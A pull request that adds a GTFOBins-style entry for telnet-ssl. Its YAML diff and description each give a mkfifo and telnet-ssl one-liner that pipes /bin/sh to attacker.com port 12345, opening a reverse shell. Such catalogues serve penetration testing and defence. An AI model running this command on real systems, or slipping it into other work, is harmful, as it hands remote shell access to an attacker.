### PR TITLE
Add telnet-ssl for Reverse Shell Exploitation

### DIFF
--- a/_gtfobins/telnet-ssl
+++ b/_gtfobins/telnet-ssl
@@ -1,0 +1,15 @@
+---
+comment: telnet-ssl can be abused to create reverse shells through a named pipe.
+functions:
+  reverse-shell:
+    - comment: Creates a reverse shell using telnet-ssl and a named pipe.
+      code: |
+        mkfifo /path/to/temp-socket
+        telnet-ssl attacker.com 12345 </path/to/temp-socket | /bin/sh >/path/to/temp-socket
+      tty: false
+      listener: TCP
+      contexts:
+        unprivileged:
+          code: |
+            mkfifo /path/to/temp-socket
+            telnet-ssl attacker.com 12345 </path/to/temp-socket | /bin/sh >/path/to/temp-socket


### PR DESCRIPTION
## Add telnet-ssl reverse shell entry

This pull request adds a new GTFOBins entry for `telnet-ssl`.

`telnet-ssl` can be abused to establish a reverse shell by creating a named pipe and redirecting the shell's standard input/output through a TCP connection initiated by `telnet-ssl`.

### Example

```bash
mkfifo /path/to/temp-socket
telnet-ssl attacker.com 12345 </path/to/temp-socket | /bin/sh >/path/to/temp-socket